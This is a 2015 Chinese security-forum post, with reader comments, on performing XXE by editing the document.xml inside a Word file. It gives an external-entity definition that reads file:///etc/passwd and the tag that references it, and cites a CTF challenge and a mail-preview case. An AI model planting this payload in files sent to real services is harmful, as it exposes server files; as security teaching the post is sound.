利用doc来实现xxe

2015-04-09 15:46:28 36 5858
首先是一个正常的doc文档



当将这一个doc文档改成zip,再解压后就会发现doc文档就是一堆xml文件组成的



在word文件夹里打开document.xml



可以发现doc里的内容都在<w:t></w:t>里
构造实体,并在<w:t></w:t>里引用实体来实现xxe

实体定义:
<!DOCTYPE document [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>  
实体引用:
<w:t>&xxe;</w:t>
在0ctf一道题里的效果


之前二哥就找到过在qq邮箱里对附件doc的预览来xxe
类别 渗透测试

关于作者

Blackpowder11篇文章204篇回复

Blackpowder
36

评论36次

要评论?请先  登录  或  注册
  • 16楼
    tingfeng520
    Rank: 1
    2015-4-10 15:53

    哪个版本的OWRD

  • 15楼
    faust
    Rank: 1
    2015-4-10 15:50

    ……这玩意freebuf里面不是有公开课讲的很细了吗???

  • 14楼
    icerain
    2015-4-10 14:46

    1.doc 重命名为1.zip?没法解压,也没法用zip打开,提示数据损坏,本机wps winrar环境

  • 13楼
    blackmou
    Rank: 1
    2015-4-10 14:22

    还可以把记录的东西 发送出去。。 不过用word 2003 2010 打开无果, 用wps 可以执行

  • 12楼
    lyy0755
    Rank: 2
    2015-4-10 14:04

    乌云那里的没看到,看到LZ的确实get到新技能了

  • 11楼
    5inb4d
    Rank: 2
    2015-4-10 09:59

    孤陋寡闻了,第一次听说xxe,还专门特地去百度了下,才发现是XML外部实体注入攻击 看来不能放松学xi呀 请问docx也可以实现xxe么?

  • 10楼
    xiaofeihk 深圳瑞腾网络传媒科技有限公司 CEO
    Rank: 1
    2015-4-10 08:58

    思路很好,测试成功。。。

  • 9楼
    xxoo
    Rank: 1
    2015-4-10 00:58

    不小心看成exe了。。

  • 8楼
    r0ckFly
    Rank: 1
    2015-4-9 19:45
    r0ckFly

    试了试,不行啊。下面是我打开的XML文档<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/theme/theme/themeManager.xml" ContentType="application/vnd.openxmlformats-officedocument.themeManager+xml"/><Override PartName="/theme/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/></Types>

    1
    Blackpowder

    打开document.xml

    2

    打开了,谢谢啊。ND,看错文档名称了。。。。

  • 7楼
    Blackpowder
    Rank: 1
    2015-4-9 19:40
    r0ckFly

    试了试,不行啊。下面是我打开的XML文档<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/theme/theme/themeManager.xml" ContentType="application/vnd.openxmlformats-officedocument.themeManager+xml"/><Override PartName="/theme/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/></Types>

    1

    打开document.xml

  • 6楼
    r0ckFly
    Rank: 1
    2015-4-9 19:37

    试了试,不行啊。 下面是我打开的XML文档 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/theme/theme/themeManager.xml" ContentType="application/vnd.openxmlformats-officedocument.themeManager+xml"/><Override PartName="/theme/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/></Types>

  • 5楼
    codingm3 湖南理工学院 网络工程 学生
    Rank: 1
    2015-4-9 19:23
    Jumbo

    刚刚试了下,貌似里面没xml文件

    1

    刚试了下,确实如文章所说。我的版本是2013的,不知道是不是你的版本问题

  • 4楼
    Jumbo
    Rank: 2
    2015-4-9 19:16

    刚刚试了下,貌似里面没xml文件

  • 3楼
    flower
    Rank: 1
    2015-4-9 18:40

    CTF里的,百度 QQ都有过这个问题。

  • 2楼
    枫叶
    Rank: 2
    2015-4-9 18:19

    这个是在zone.wooyun.org上面的吧。

  • 1楼
    houdao
    Rank: 2
    2015-4-9 17:21

    这想法真不错。 连word都能用来实现XXE了。